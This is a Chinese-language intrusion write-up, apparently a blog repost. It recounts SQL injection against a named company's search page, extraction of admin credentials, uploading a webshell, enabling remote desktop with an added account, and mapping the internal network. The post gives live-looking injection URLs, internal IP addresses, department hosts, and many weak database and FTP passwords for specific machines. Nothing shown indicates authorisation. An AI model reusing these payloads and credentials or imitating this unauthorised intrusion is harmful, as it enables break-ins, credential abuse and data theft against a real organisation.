一个被忽略的SQL注射漏洞
http://fc.tcl.com/cn/search.aspx?k=1';select%20*%20from%20sysobjects%20where%20@@version%3E0;--
clip_image002
测试其它工具均失效,就穿山甲成功了。但是暴数据的时候穿山甲又挂了
clip_image003
无所谓,自己搞了试试吧。
http://fc.tcl.com/cn/search.aspx?k=1';select top 1 password from AdminUsers where password>0;--
clip_image005
最后获取到后台的账号密码:Admin/0101。

后台拿shell:
在可上传附件的地方上传了,然后在前台找文章,就知道附件路径了:
clip_image006
clip_image008
Shell到手。找了下sa的密码,然后各种转发啊,抓用户密码啊,就不提了,虽然有3哥。
服务器上也发现了前辈的足迹。
clip_image009
clip_image010
为了避免“干扰”,删除了几个已经“遗留”的小shell,和对upload文件夹进行了一下限制(其实有sa,这些都是浮云,懒得改sa了):
clip_image011
clip_image012
clip_image014

下面讲进入内网获取到的信息
先看看和WEB服务器同段内有什么主机,以下是相关信息:
\\DATA        10.0.16.42
\\PRINTERS10.0.16.8
\\WWW        10.0.16.10
\\公司客户部10.0.16.18
\\共享服务器10.0.16.31
\\征信系统10.0.16.33
\\扫描        10.0.16.45
\\现金管理部10.0.16.12
\\计划财务部                   10.0.16.11
\\金融机构部10.0.16.13
\\风险管理部           HP-1008MFP Server        10.0.16.15
再扫描了一下:
clip_image015
查看下ie的历史记录:
clip_image016
clip_image017
clip_image019
clip_image020
clip_image022
东西还是不少的
10.0.16.31的administrator账户没有密码可以直接做点坏事:
clip_image023
clip_image025
clip_image027
开启3389,添加用户,登录成功:
clip_image029
clip_image031
clip_image033
clip_image035
clip_image037
10.0.0.65集团财务预警分析系统
clip_image039
clip_image041
clip_image043
clip_image045
clip_image046
报表系统用户名密码相同
clip_image048
clip_image050
clip_image051
clip_image052
clip_image053
clip_image055
.40这台机器还存在mssql  sa/123456的弱口令,FTP 也存在弱口令。
84为匿名FTP
clip_image056
clip_image057
10.92.2.30 mssql Sa/sa
clip_image058
clip_image060
域控服务器?不知道干啥用的哦
clip_image062
内网的杀毒软件就是摆设一样:
clip_image064
10.92.2.7存在mysql的弱口令 root/空密码
clip_image065
10.92.3.70的FTP弱口令:
clip_image066
10.120.99.x网段:
clip_image068
clip_image069
大部分PUT不了。也做一个提醒。
还有匿名FTP自行发现。
10.92.8.x网段
clip_image070
不看了……
另外好多台都是打印机啊……
比如http://10.0.16.11
http://10.0.16.16
http://10.0.16.21 等。
10.0.16.16存在匿名ftp
10.0.16.18有FTP弱口令Admin/admin
10.0.16.22存在匿名ftp
很多机器都有IPC空会话………………
大概意思就是这样。

源链接

Hacking more

...